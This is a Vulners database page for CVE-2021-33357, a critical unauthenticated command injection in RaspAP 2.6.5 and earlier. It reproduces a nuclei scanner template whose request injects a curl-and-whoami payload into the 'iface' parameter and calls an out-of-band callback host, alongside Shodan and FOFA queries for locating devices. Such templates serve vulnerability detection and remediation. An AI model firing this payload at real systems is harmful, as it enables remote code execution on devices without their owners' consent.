Lucene search
K

RaspAP <=2.6.5 - Remote Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

RaspAP <=2.6.5 - Remote Command Injection allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-33357
9 Jun 202100:00
attackerkb
Circl
CVE-2021-33357
3 Feb 202500:00
circl
CNNVD
RaspAP 操作系统命令注入漏洞
9 Jun 202100:00
cnnvd
Check Point Advisories
RaspAP Command Injection (CVE-2021-33357)
30 Dec 202100:00
checkpoint_advisories
CVE
CVE-2021-33357
9 Jun 202117:51
cve
Cvelist
CVE-2021-33357
9 Jun 202117:51
cvelist
NVD
CVE-2021-33357
9 Jun 202118:15
nvd
Prion
Design/Logic Flaw
9 Jun 202118:15
prion
RedhatCVE
CVE-2021-33357
9 Jan 202611:26
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2021-33357
21 Dec 202100:00
vulncheck_kev
Rows per page
id: CVE-2021-33357

info:
  name: RaspAP <=2.6.5 - Remote Command Injection
  author: pikpikcu,pdteam
  severity: critical
  description: |
    RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";".
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system.
  remediation: |
    Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability.
  reference:
    - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
    - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf
    - https://github.com/RaspAP/raspap-webgui
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33357
    cwe-id: CWE-78
    epss-score: 0.17905
    epss-percentile: 0.96816
    cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: raspap
    product: raspap
    shodan-query: http.favicon.hash:-1465760059
    fofa-query: icon_hash=-1465760059
  tags: cve2021,cve,rce,raspap,oast,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "DHCPEnabled"

    extractors:
      - type: regex
        group: 1
        regex:
          - 'GET \/([a-z-]+) HTTP'
        part: interactsh_request
# digest: 490a0046304402205022f510a5ceaa2b9f307206cd9b4c4d1041c3a6762c587caa7e9cbceb807beb0220509d756065c1abc00d4500de61de5b5a27c68d6f516454b51f068de684625229:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.17905
29